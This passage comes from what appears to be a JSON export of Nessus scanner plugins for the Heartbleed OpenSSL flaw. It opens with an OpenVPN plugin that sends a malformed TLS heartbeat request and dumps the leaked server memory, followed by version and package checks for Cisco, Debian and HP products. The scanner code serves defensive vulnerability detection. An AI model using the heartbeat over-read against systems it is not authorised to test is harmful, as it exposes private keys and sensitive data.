clt_sid   = _ovpn['clt_sid'];\n  srv_sid   = _ovpn['srv_sid'];\n  pkt_id    = _ovpn['pkt_id'];\n\n  pkt = mkbyte(opcode << P_OPCODE_SHIFT) +\n        clt_sid;\n\n  # Append ack record\n  n = 0;\n  ack_rec = NULL;\n  foreach ack (ack_list)\n  {\n    ack_rec += mkdword(ack);\n    n++;\n  }\n  ack_rec = mkbyte(n) + ack_rec;\n  pkt +=  ack_rec;\n\n  # Append remote session id associated with the ack record\n  if (n) pkt += srv_sid;\n\n  # We only send:\n  #   P_CONTROL_HARD_RESET_CLIENT_V2\n  #   P_CONTROL_V1\n  #   P_ACK_V1\n  if (opcode == P_CONTROL_HARD_RESET_CLIENT_V2)\n  {\n    pkt += mkdword(pkt_id);\n  }\n  else if (opcode == P_CONTROL_V1)\n  {\n    pkt += mkdword(pkt_id);\n\n    pkt += data;\n  }\n  else if (opcode == P_ACK_V1)\n  {\n    # No addditional data in P_ACK_V1\n  }\n\n  return pkt;\n}\n\n#\n# Main\n#\n\n# OpenVPN can listen on UDP or TCP. The same daemon can only listen on one or the other,\n# but it is apparently common practice to run two daemons to do both UDP and TCP, and the\n# OpenVPN authors have considered adding the ability to do both together.\n# We cannot use get_service, because it will fork twice for the same port, giving the children\n# no information about which of the two protocols they should be handling.\n# Instead, we get a unique list of ports (UDP and TCP together) and fork for each of those ports,\n# and then figure out the protocol afterwards, forking again if necessary.\n\nports = get_kb_list(\"openvpn/*/proto\");\nif (isnull(ports)) audit(AUDIT_NOT_DETECT, \"OpenVPN\");\n\n# List of [ \"openvpn/1194\", \"openvpn/5000\", etc. ]\nports = list_uniq(keys(ports));\n\n# Strip the text from each list item, leaving only the port number\nfor (i = 0; i < max_index(ports); ++i)\n{\n  m = eregmatch(string:ports[i], pattern:\"^openvpn/([0-9]+)/proto$\");\n  ports[i] = int(m[1]);\n}\n\n# Fork for port, and then get the protocol (forking again if both TCP and UDP are used)\nport = branch(ports, fork:TRUE);\nproto = tolower(get_kb_item(\"openvpn/\" + port + \"/proto\"));\n\n# We use this later in audit messages - looks like \"TCP port 1194\"\nproto_port = toupper(proto) + ' port ' + string(port);\n\nif (tolower(get_kb_item(\"openvpn/\" + port + \"/\" + proto + \"/mode\")) != \"tls\")\n  exit(0, \"The OpenVPN service on \" + proto_port + \" is not running in TLS mode\");\n\nif (proto == \"udp\")\n{\n  if (!get_udp_port_state(port)) audit(AUDIT_PORT_CLOSED, port, \"UDP\");\n}\nelse\n{\n  if (!get_tcp_port_state(port)) audit(AUDIT_PORT_CLOSED, port, \"TCP\");\n}\n\novpn_init(port:port, proto:proto);\n\nif (!ovpn_open_sock()) exit(1, ovpn_get_last_error());\n\n# Tell the server we want to start a new session with it\npkt = ovpn_mk_pkt(opcode:P_CONTROL_HARD_RESET_CLIENT_V2);\novpn_write(data:pkt);\n\npkt = ovpn_read();\nif (isnull(pkt))\n  exit(1, \"Did not receive a response from the OpenVPN server on \" + proto_port + \". \" +\n          \"The 'HMAC Firewall' feature may be enabled.\");\n\nparsed = ovpn_parse_pkt(pkt:pkt);\nif (isnull(parsed)) exit(1, ovpn_get_last_error());\n\n# Make sure the server understands what we want to do\nif (parsed['opcode'] != P_CONTROL_HARD_RESET_SERVER_V2)\n  exit(1, 'Did not receive the expected P_CONTROL_HARD_RESET_SERVER_V2 from the OpenVPN server on ' + proto_port);\n\n# OpenVPN uses P_ACK_V1 packets when it is simply ACKing, but\n# otherwise sends the next message it means to send and bundles\n# one or more ACKs with it.\n# Here, we handle the ACK from the received P_CONTROL_HARD_RESET_SERVER_V2\nack_list = parsed['ack-list'];\nforeach ack (ack_list)\n{\n  if (ack == _ovpn['pkt_id'])\n  {\n    _ovpn['pkt_id']++;\n    break;\n  }\n}\n\n# If we never received an ACK, as mentioned above, we shouldn't proceed.\nif (_ovpn['pkt_id'] != 1)\n  exit(1, 'P_CONTROL_HARD_RESET_CLIENT_V2 not ACKed.');\n\n# ACK the P_CONTROL_HARD_RESET_SERVER_V2 we received from the server\npkt = ovpn_mk_pkt(opcode:P_ACK_V1, ack_list:make_list(parsed['pkt_id']));\novpn_write(data:pkt);\n\n# We use TLS 1.2 to accomodate all TLS versions configured\n# on the server (i.e., --tls-version-min).\n#\n# OpenVPN server that doesn't support 1.2 will\n# downgrade to a lower version. We capture the lower version\n# in ServerHello, and send the heartbleed attack using that\n# lower TLS version.\nversion = TLS_12;\n\n# OpenVPN supported TLS ciphers, output of --show-tls\ncipherspec = raw_string(\n0xc0,0x30, # TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\n0xc0,0x2c, # TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384\n0xc0,0x28, # TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384\n0xc0,0x24, # TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384\n0xc0,0x14, # TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA\n0xc0,0x0a, # TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA\n0x00,0xa3, # TLS_DHE_DSS_WITH_AES_256_GCM_SHA384\n0x00,0x9f, # TLS_DHE_RSA_WITH_AES_256_GCM_SHA384\n0x00,0x6b, # TLS_DHE_RSA_WITH_AES_256_CBC_SHA256\n0x00,0x6a, # TLS_DHE_DSS_WITH_AES_256_CBC_SHA256\n0x00,0x39, # TLS_DHE_RSA_WITH_AES_256_CBC_SHA\n0x00,0x38, # TLS_DHE_DSS_WITH_AES_256_CBC_SHA\n0x00,0x88, # TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA\n0x00,0x87, # TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA\n0xc0,0x32, # TLS_ECDH_RSA_WITH_AES_256_GCM_SHA384\n0xc0,0x2e, # TLS_ECDH_ECDSA_WITH_AES_256_GCM_SHA384\n0xc0,0x2a, # TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384\n0xc0,0x26, # TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384\n0xc0,0x0f, # TLS_ECDH_RSA_WITH_AES_256_CBC_SHA\n0xc0,0x05, # TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA\n0x00,0x9d, # TLS_RSA_WITH_AES_256_GCM_SHA384\n0x00,0x3d, # TLS_RSA_WITH_AES_256_CBC_SHA256\n0x00,0x35, # TLS_RSA_WITH_AES_256_CBC_SHA\n0x00,0x84, # TLS_RSA_WITH_CAMELLIA_256_CBC_SHA\n0x00,0x8d, # TLS_PSK_WITH_AES_256_CBC_SHA\n0xc0,0x12, # TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA\n0xc0,0x08, # TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA\n0x00,0x16, # TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA\n0x00,0x13, # TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA\n0xc0,0x0d, # TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA\n0xc0,0x03, # TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA\n0x00,0x0a, # TLS_RSA_WITH_3DES_EDE_CBC_SHA\n0x00,0x8b, # TLS_PSK_WITH_3DES_EDE_CBC_SHA\n0x00,0x1f, # TLS_KRB5_WITH_3DES_EDE_CBC_SHA, KRB5-DES-CBC3-SHA (OpenSSL name)\n0x00,0x23, # TLS_KRB5_WITH_3DES_EDE_CBC_MD5, KRB5-DES-CBC3-MD5 (OpenSSL name)\n0xc0,0x2f, # TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256\n0xc0,0x2b, # TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256\n0xc0,0x27, # TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256\n0xc0,0x23, # TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256\n0xc0,0x13, # TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA\n0xc0,0x09, # TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA\n0x00,0xa2, # TLS_DHE_DSS_WITH_AES_128_GCM_SHA256\n0x00,0x9e, # TLS_DHE_RSA_WITH_AES_128_GCM_SHA256\n0x00,0x67, # TLS_DHE_RSA_WITH_AES_128_CBC_SHA256\n0x00,0x40, # TLS_DHE_DSS_WITH_AES_128_CBC_SHA256\n0x00,0x33, # TLS_DHE_RSA_WITH_AES_128_CBC_SHA\n0x00,0x32, # TLS_DHE_DSS_WITH_AES_128_CBC_SHA\n0x00,0x9a, # TLS_DHE_RSA_WITH_SEED_CBC_SHA\n0x00,0x99, # TLS_DHE_DSS_WITH_SEED_CBC_SHA\n0x00,0x45, # TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA\n0x00,0x44, # TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA\n0xc0,0x31, # TLS_ECDH_RSA_WITH_AES_128_GCM_SHA256\n0xc0,0x2d, # TLS_ECDH_ECDSA_WITH_AES_128_GCM_SHA256\n0xc0,0x29, # TLS_ECDH_RSA_WITH_AES_128_CBC_SHA256\n0xc0,0x25, # TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA256\n0xc0,0x0e, # TLS_ECDH_RSA_WITH_AES_128_CBC_SHA\n0xc0,0x04, # TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA\n0x00,0x9c, # TLS_RSA_WITH_AES_128_GCM_SHA256\n0x00,0x3c, # TLS_RSA_WITH_AES_128_CBC_SHA256\n0x00,0x2f, # TLS_RSA_WITH_AES_128_CBC_SHA\n0x00,0x96, # TLS_RSA_WITH_SEED_CBC_SHA\n0x00,0x41, # TLS_RSA_WITH_CAMELLIA_128_CBC_SHA\n0x00,0x07, # TLS_RSA_WITH_IDEA_CBC_SHA, IDEA-CBC-SHA (OpenSSL name)\n0x00,0x8c, # TLS_PSK_WITH_AES_128_CBC_SHA\n0x00,0x21, # TLS_KRB5_WITH_IDEA_CBC_SHA, KRB5-IDEA-CBC-SHA (OpenSSL name)\n0x00,0x25, # TLS_KRB5_WITH_IDEA_CBC_MD5, KRB5-IDEA-CBC-MD5 (OpenSSL name)\n0xc0,0x11, # TLS_ECDHE_RSA_WITH_RC4_128_SHA\n0xc0,0x07, # TLS_ECDHE_ECDSA_WITH_RC4_128_SHA\n0xc0,0x0c, # TLS_ECDH_RSA_WITH_RC4_128_SHA\n0xc0,0x02, # TLS_ECDH_ECDSA_WITH_RC4_128_SHA\n0x00,0x05, # TLS_RSA_WITH_RC4_128_SHA\n0x00,0x04, # TLS_RSA_WITH_RC4_128_MD5\n0x00,0x8a, # TLS_PSK_WITH_RC4_128_SHA\n0x00,0x20, # TLS_KRB5_WITH_RC4_128_SHA, KRB5-RC4-SHA (OpenSSL name)\n0x00,0x24, # TLS_KRB5_WITH_RC4_128_MD5, KRB5-RC4-MD5 (OpenSSL name)\n0x00,0x15, # TLS_DHE_RSA_WITH_DES_CBC_SHA\n0x00,0x12, # TLS_DHE_DSS_WITH_DES_CBC_SHA\n0x00,0x09, # TLS_RSA_WITH_DES_CBC_SHA\n0x00,0x1e, # TLS_KRB5_WITH_DES_CBC_SHA, KRB5-DES-CBC-SHA (OpenSSL name)\n0x00,0x22, # TLS_KRB5_WITH_DES_CBC_MD5, KRB5-DES-CBC-MD5 (OpenSSL name)\n0x00,0x0e, # TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA\n0x00,0x0b, # TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA\n0x00,0x08, # TLS_RSA_EXPORT_WITH_DES40_CBC_SHA\n0x00,0x06, # TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5\n0x00,0x27, # TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA, EXP-KRB5-RC2-CBC-SHA (OpenSSL name)\n0x00,0x26, # TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA, EXP-KRB5-DES-CBC-SHA (OpenSSL name)\n0x00,0x2a, # TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5, EXP-KRB5-RC2-CBC-MD5 (OpenSSL name)\n0x00,0x29, # TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5, EXP-KRB5-DES-CBC-MD5 (OpenSSL name)\n0x00,0x03, # TLS_RSA_EXPORT_WITH_RC4_40_MD5\n0x00,0x28, # TLS_KRB5_EXPORT_WITH_RC4_40_SHA, EXP-KRB5-RC4-SHA (OpenSSL name)\n0x00,0x2b  # TLS_KRB5_EXPORT_WITH_RC4_40_MD5, EXP-KRB5-RC4-MD5 (OpenSSL name)\n);\n\n# Make our ClientHello, offering support for heartbeat.\n# Also send EC extensions because we offer EC based ciphers.\nver  = mkword(version);\nexts = heartbeat_ext() + tls_ext_ec() + tls_ext_ec_pt_fmt();\nexts_len = mkword(strlen(exts));\nchello = client_hello(v2hello:FALSE, version:ver,\n                      cipherspec : cipherspec,\n                      extensions:exts,extensionslen:exts_len);\n\n# Wrap it up into an OpenVPN packet\nchello = ovpn_mk_pkt(opcode:P_CONTROL_V1, data:chello);\novpn_write(data:chello);\n\n# Receive up to 1MB from the server - should contain ServerHello, key exchange, and ServerHelloDone\ndata = ovpn_rel_read(len:1024 * 1024);\n\nhello_done = FALSE;\nwhile (!hello_done)\n{\n  if (isnull(data)) audit(AUDIT_RESP_NOT, port, 'a TLS ClientHello message', proto);\n\n  # ServerHello: Extract the random data for computation of keys.\n  rec = ssl_find(\n    blob:data,\n    'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n    'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_HELLO\n  );\n\n  if (!isnull(rec))\n  {\n    # Look for heartbeat mode in ServerHello\n    heartbeat_mode = rec['extension_heartbeat_mode'];\n\n    # Make sure we use an SSL version supported by the server\n    if(rec['version'] != version && rec['version'] >= 0x0301 && rec['version'] <= 0x0303)\n      version = rec['version'];\n  }\n\n  # Server Hello Done.\n  rec = ssl_find(\n    blob:data,\n    'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n    'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_HELLO_DONE\n  );\n\n  if (!isnull(rec))\n  {\n    hello_done = TRUE;\n    break;\n  }\n}\nif (! hello_done)\n  exit(1, 'ServerHelloDone not received from OpenVPN server listening on ' + proto_port +'.');\n\n# Check if TLS server supports heartbeat extension\nif (isnull(heartbeat_mode))\n  exit(0, 'The OpenVPN service listening on ' + proto_port + ' does not appear to support heartbeat extension.');\n\n# Check if TLS server willing to accept heartbeat requests\nif (heartbeat_mode != 1)\n  exit(0, 'The OpenVPN service listening on ' + proto_port + ' does not appear to accept heartbeat requests.');\n\n\n# Send a malformed heartbeat request\npayload = crap(data:'A', length:16);\npad = crap(data:'P',length:16);\nhb_req = heartbeat_req(payload:payload, plen:strlen(payload)+ strlen(pad)+4096, pad:pad);\nrec = tls_mk_record(type:24, data:hb_req, version:version);\npkt = ovpn_mk_pkt(opcode:P_CONTROL_V1, data:rec);\novpn_write(data:pkt);\n\n# Receive up to 1MB from the server\nres = ovpn_rel_read(len:1024 * 1024);\n\n# Close the socket\novpn_close();\n\n# Patched TLS server does not respond\nif (isnull(res))\n  exit(0, 'The OpenVPN install listening on ' + proto_port + ' is not affected.');\n\n# Got a response\n# Look for hearbeat response\ndata = ord(res[5]);\nif (data != 2)\n  exit(1, 'The service listening on ' + proto_port + ' did not return a heartbeat response.');\n\nif (ord(res[0]) == 0x15)\n  exit(0, 'The service listening on ' + proto_port + ' returned an alert, which suggests the remote OpenVPN service is not affected.');\n\n# TLS server overread past payload into the padding field\nif ((payload + pad) >!< res)\n  audit(AUDIT_RESP_BAD, port, \"invalid TLS heartbeat\", toupper(proto));\n\nreport = NULL;\nif (report_verbosity > 0)\n{\n  hb_res = substr(res, 8);\n  hb_res -= (payload + pad);\n  report = 'Nessus was able to read the following memory from the remote OpenVPN service :\\n\\n' + data_protection::sanitize_user_full_redaction(output:hexdump(ddata:hb_res));\n}\nsecurity_warning(port:port, extra:report, proto:proto);\n",
            "cvss": {
                "score": 5.0,
                "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"
            }
        },
        {
            "lastseen": "2021-04-01T01:42:06",
            "description": "According to its self-reported version number, the version of Cisco\nTelePresence Video Communication Server installed on the remote host\nis affected by an out-of-bounds read error, known as the 'Heartbleed\nBug' in the included OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content. Note\nthis affects both client and server modes of operation.",
            "edition": 29,
            "published": "2014-05-14T00:00:00",
            "title": "Cisco TelePresence Video Communication Server Heartbeat Information Disclosure (Heartbleed)",
            "type": "nessus",
            "bulletinFamily": "scanner",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "modified": "2021-04-02T00:00:00",
            "cpe": [
                "cpe:/a:cisco:telepresence_video_communication_server_software"
            ],
            "id": "CISCO-VCS-CSCUO16472.NASL",
            "href": "https://www.tenable.com/plugins/nessus/74010",
            "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n  script_id(74010);\n  script_version(\"1.10\");\n  script_cvs_date(\"Date: 2019/11/26\");\n\n  script_cve_id(\"CVE-2014-0160\");\n  script_bugtraq_id(66690);\n  script_xref(name:\"CERT\", value:\"720951\");\n  script_xref(name:\"EDB-ID\", value:\"32745\");\n  script_xref(name:\"EDB-ID\", value:\"32764\");\n  script_xref(name:\"EDB-ID\", value:\"32791\");\n  script_xref(name:\"EDB-ID\", value:\"32998\");\n  script_xref(name:\"CISCO-BUG-ID\", value:\"CSCuo16472\");\n\n  script_name(english:\"Cisco TelePresence Video Communication Server Heartbeat Information Disclosure (Heartbleed)\");\n  script_summary(english:\"Checks software version.\");\n\n  script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Cisco TelePresence Video Communication Server installed\non the remote host is affected by an information disclosure\nvulnerability.\");\n  script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the version of Cisco\nTelePresence Video Communication Server installed on the remote host\nis affected by an out-of-bounds read error, known as the 'Heartbleed\nBug' in the included OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content. Note\nthis affects both client and server modes of operation.\");\n  # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed\n  script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6e5886ef\");\n  script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCuo16472\");\n  script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n  script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n  script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n  script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n  script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 7.2.3 / 8.1.1 or later.\");\n  script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n  script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n  script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n  script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n  script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n  script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n  script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n  script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n  script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/09\");\n  script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/14\");\n\n  script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n  script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n  script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:telepresence_video_communication_server_software\");\n  script_end_attributes();\n\n  script_category(ACT_GATHER_INFO);\n  script_family(english:\"CISCO\");\n\n  script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n  script_dependencies(\"cisco_telepresence_video_communication_server_detect.nbin\");\n  script_require_keys(\"Cisco/TelePresence_VCS/Version\", \"Settings/ParanoidReport\");\n\n  exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nprod = \"Cisco TelePresence Video Communication Server\";\nversion = get_kb_item_or_exit(\"Cisco/TelePresence_VCS/Version\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif (version !~ \"^7\\.2($|\\.)\" && version != \"8.1\") audit(AUDIT_INST_VER_NOT_VULN, prod, version);\n\nnote = \"\";\n\nif (version =~ \"^7\\.2($|\\.)\")\n{\n  fix = \"7.2.3\";\n  note = '\\n' +\n         '\\n' + 'Note: Users running the non-AES versions of 7.2, 7.2.1, and 7.2.2' +\n         '\\n' + 'are NOT affected by this issue, while those running 7.2.3 RC2 are.' +\n         '\\n' + 'Refer to the vendor\\'s advisory for details.';\n}\nelse if (version == \"8.1\")\n{\n  fix = \"8.1.1\";\n}\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) == -1)\n{\n  if (report_verbosity > 0)\n  {\n    report = '\\n  Installed version : ' + version +\n             '\\n  Fixed version     : ' + fix +\n             note + '\\n';\n    security_warning(port:0, extra:report);\n  }\n  else security_warning(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, prod, version);\n",
            "cvss": {
                "score": 5.0,
                "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"
            }
        },
        {
            "lastseen": "2021-01-12T09:48:25",
            "description": "A vulnerability has been discovered in OpenSSL's support for the\nTLS/DTLS Heartbeat extension. Up to 64KB of memory from either client\nor server can be recovered by an attacker. This vulnerability might\nallow an attacker to compromise the private key and other sensitive\ndata in memory.\n\nAll users are urged to upgrade their openssl packages (especially\nlibssl1.0.0) and restart applications as soon as possible.\n\nAccording to the currently available information, private keys should\nbe considered as compromised and regenerated as soon as possible. More\ndetails will be communicated at a later time.\n\nThe oldstable distribution (squeeze) is not affected by this\nvulnerability.",
            "edition": 14,
            "published": "2014-04-08T00:00:00",
            "title": "Debian DSA-2896-1 : openssl - security update",
            "type": "nessus",
            "bulletinFamily": "scanner",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "modified": "2014-04-08T00:00:00",
            "cpe": [
                "cpe:/o:debian:debian_linux:7.0",
                "p-cpe:/a:debian:debian_linux:openssl"
            ],
            "id": "DEBIAN_DSA-2896.NASL",
            "href": "https://www.tenable.com/plugins/nessus/73388",
            "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were  \n# extracted from Debian Security Advisory DSA-2896. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n  script_id(73388);\n  script_version(\"1.10\");\n  script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n  script_cve_id(\"CVE-2014-0160\");\n  script_xref(name:\"DSA\", value:\"2896\");\n\n  script_name(english:\"Debian DSA-2896-1 : openssl - security update\");\n  script_summary(english:\"Checks dpkg output for the updated package\");\n\n  script_set_attribute(\n    attribute:\"synopsis\", \n    value:\"The remote Debian host is missing a security-related update.\"\n  );\n  script_set_attribute(\n    attribute:\"description\", \n    value:\n\"A vulnerability has been discovered in OpenSSL's support for the\nTLS/DTLS Heartbeat extension. Up to 64KB of memory from either client\nor server can be recovered by an attacker. This vulnerability might\nallow an attacker to compromise the private key and other sensitive\ndata in memory.\n\nAll users are urged to upgrade their openssl packages (especially\nlibssl1.0.0) and restart applications as soon as possible.\n\nAccording to the currently available information, private keys should\nbe considered as compromised and regenerated as soon as possible. More\ndetails will be communicated at a later time.\n\nThe oldstable distribution (squeeze) is not affected by this\nvulnerability.\"\n  );\n  script_set_attribute(\n    attribute:\"see_also\",\n    value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=743883\"\n  );\n  script_set_attribute(\n    attribute:\"see_also\",\n    value:\"http://www.debian.org/security/2014/dsa-2896\"\n  );\n  script_set_attribute(\n    attribute:\"solution\", \n    value:\n\"Upgrade the openssl packages.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.0.1e-2+deb7u5.\"\n  );\n  script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n  script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n  script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n  script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n  script_set_attribute(attribute:\"metasploit_name\", value:'OpenSSL Heartbeat Information Leak');\n  script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n  script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n  script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:openssl\");\n  script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n  script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/07\");\n  script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/08\");\n  script_end_attributes();\n\n  script_category(ACT_GATHER_INFO);\n  script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n  script_family(english:\"Debian Local Security Checks\");\n\n  script_dependencies(\"ssh_get_info.nasl\");\n  script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n  exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"openssl\", reference:\"1.0.1e-2+deb7u5\", min:\"1.0.1\")) flag++;\n\nif (flag)\n{\n  if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n  else security_hole(0);\n  exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n",
            "cvss": {
                "score": 9.4,
                "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"
            }
        },
        {
            "lastseen": "2021-04-01T03:30:07",
            "description": "The HP Version Control Repository Manager (VCRM) install\non the remote Windows host is version 7.2.0, 7.2.1, 7.2.2, 7.3.0, or\n7.3.1. It is, therefore, affected by an information disclosure\nvulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.",
            "edition": 31,
            "published": "2014-08-06T00:00:00",
            "title": "HP Version Control Repository Manager (VCRM) Heartbeat Information Disclosure (Heartbleed)",
            "type": "nessus",
            "bulletinFamily": "scanner",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "modified": "2021-04-02T00:00:00",
            "cpe": [
                "cpe:/a:hp:version_control_repository_manager"
            ],
            "id": "HP_VCRM_SSRT101531.NASL",
            "href": "https://www.tenable.com/plugins/nessus/77025",
            "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n  script_id(77025);\n  script_version(\"1.11\");\n  script_cvs_date(\"Date: 2019/11/25\");\n\n  script_cve_id(\"CVE-2014-0160\");\n  script_bugtraq_id(66690);\n  script_xref(name:\"CERT\", value:\"720951\");\n  script_xref(name:\"EDB-ID\", value:\"32745\");\n  script_xref(name:\"EDB-ID\", value:\"32764\");\n  script_xref(name:\"EDB-ID\", value:\"32791\");\n  script_xref(name:\"EDB-ID\", value:\"32998\");\n  script_xref(name:\"HP\", value:\"emr_na-c04262472\");\n  script_xref(name:\"HP\", value:\"HPSBMU03020\");\n  script_xref(name:\"HP\", value:\"SSRT101531\");\n\n  script_name(english:\"HP Version Control Repository Manager (VCRM) Heartbeat Information Disclosure (Heartbleed)\");\n  script_summary(english:\"Checks the version of the VCA package.\");\n\n  script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains software that is affected by an information\ndisclosure vulnerability.\");\n  script_set_attribute(attribute:\"description\", value:\n\"The HP Version Control Repository Manager (VCRM) install\non the remote Windows host is version 7.2.0, 7.2.1, 7.2.2, 7.3.0, or\n7.3.1. It is, therefore, affected by an information disclosure\nvulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.\");\n  # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c04262472\n  script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ea63ebcc\");\n  script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n  script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n  script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n  script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n  script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VCRM 